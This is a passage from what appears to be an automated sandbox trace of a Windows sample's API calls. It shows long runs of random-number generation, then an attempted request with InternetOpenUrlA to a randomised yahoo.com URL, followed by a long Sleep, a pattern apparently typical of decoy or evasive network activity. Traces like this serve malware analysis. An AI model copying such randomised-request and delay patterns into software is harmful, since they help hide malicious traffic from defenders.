out: pbBuffer=0x46ffd5e) returned 0x0 [0167.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0167.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4efd, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x4d4efd) returned 0x0 [0167.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0167.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4f2c, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x4d4f2c) returned 0x0 [0167.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.577] GetProcessHeap () returned 0x440000 [0167.577] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0167.577] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x03ø\x1e·s://www.yahoo.com" | out: lpString1="\x03ø\x1e·s://www.yahoo.com") returned="\x03ø\x1e·s://www.yahoo.com" [0167.577] lstrcatA (in: lpString1="\x03ø\x1e·s://www.yahoo.com", lpString2="/djlzq1j6Wiaj7ed3xuyCxmzv98i7UtuYrjk9fdf/10ug18adUh2e998ya12fwvgb30MwqHrS535/hseTg3fRojgowDK68ldd108b02s3f5p634slehrNENTcoi/a16m9co3xwi2oh2srxupcP4/" | out: lpString1="\x03ø\x1e·s://www.yahoo.com/djlzq1j6Wiaj7ed3xuyCxmzv98i7UtuYrjk9fdf/10ug18adUh2e998ya12fwvgb30MwqHrS535/hseTg3fRojgowDK68ldd108b02s3f5p634slehrNENTcoi/a16m9co3xwi2oh2srxupcP4/") returned="\x03ø\x1e·s://www.yahoo.com/djlzq1j6Wiaj7ed3xuyCxmzv98i7UtuYrjk9fdf/10ug18adUh2e998ya12fwvgb30MwqHrS535/hseTg3fRojgowDK68ldd108b02s3f5p634slehrNENTcoi/a16m9co3xwi2oh2srxupcP4/" [0167.577] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0167.578] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x03ø\x1e·s://www.yahoo.com/djlzq1j6Wiaj7ed3xuyCxmzv98i7UtuYrjk9fdf/10ug18adUh2e998ya12fwvgb30MwqHrS535/hseTg3fRojgowDK68ldd108b02s3f5p634slehrNENTcoi/a16m9co3xwi2oh2srxupcP4/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0167.578] GetProcessHeap () returned 0x440000 [0167.578] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0167.578] GetProcessHeap () returned 0x440000 [0167.578] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4eb0 | out: hHeap=0x440000) returned 1 [0167.578] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0167.578] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0167.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0167.579] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0167.579] Sleep (dwMilliseconds=0x1a619) [0167.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0167.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.692] GetProcessHeap () returned 0x440000 [0167.692] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16300 [0167.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16301, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a16301) returned 0x0 [0167.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.697] 